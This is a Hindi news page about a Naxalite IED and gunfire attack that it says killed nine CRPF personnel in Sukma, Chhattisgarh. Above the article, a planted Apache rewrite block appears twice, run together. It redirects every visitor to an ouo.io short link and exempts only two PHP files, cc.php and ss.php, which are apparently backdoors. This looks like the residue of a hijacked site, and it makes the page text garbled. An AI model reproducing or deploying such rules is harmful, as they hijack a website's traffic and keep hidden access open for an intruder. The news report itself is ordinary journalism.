
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 485
Previous Nextसुकमा। छत्तीसगढ़ के सुकमा स्थित किस्टाराम एरिया में आज नक्सलियों ने एक बड़े हमले की साजिश को अंजाम दिया। इस हमले में सीआरपीएफ के 212 बटालियन के 9 जवान शहीद हो गए। इसके अलावा सीआरपीएफ के 6 जवान घायल हैं जिसमें से चार की हालत गंभीर बतायी जा रही है। नक्सल रोधी ऑपरेशन के स्पेशल डीजी, डीएम अवस्थी ने बताया, 'किस्टाराम से पलोडी जा रही पैट्रोलिंग पार्टी पर नक्सलियों ने आइइडी ब्लास्ट किया। अतिरिक्त सैन्य बल मौके पर पहुंच गयी है। फिलहाल फायरिंग बंद है।'
बताया जा रहा है कि किस्टाराम कैंप से 212 बटालियन की टीमें गश्त में निकली थी। तभी करीब साढ़े सात बजे सुबह नक्सलियों ने उन पर फायरिंग शुरू कर दी। करीब 150 की संख्या में नक्सली वहां पर थे। उन्होंने जवानों पर अंधाधुंध फायरिंग शुरु कर दी। इसके जवाब में जवानों ने मोर्चा संभाला। इस दौरान नक्सलियों ने कई विस्फोट किए। नक्सली जंगल का फायदा उठाकर भाग गए। शुरुआती दौर में पुलिस की ओर से दावे किए जा रहे हैं कि मुठभेड़ में नक्सली भी मारे गए हैं। हालांकि संख्या को लेकर स्थिति स्पष्ट नहीं है। इस घटना को लेकर आईबी का पहले से अलर्ट था। इसमें नक्सलियों द्वारा बड़ी घटना को अंजाम देने की साजिश करना बताया गया था।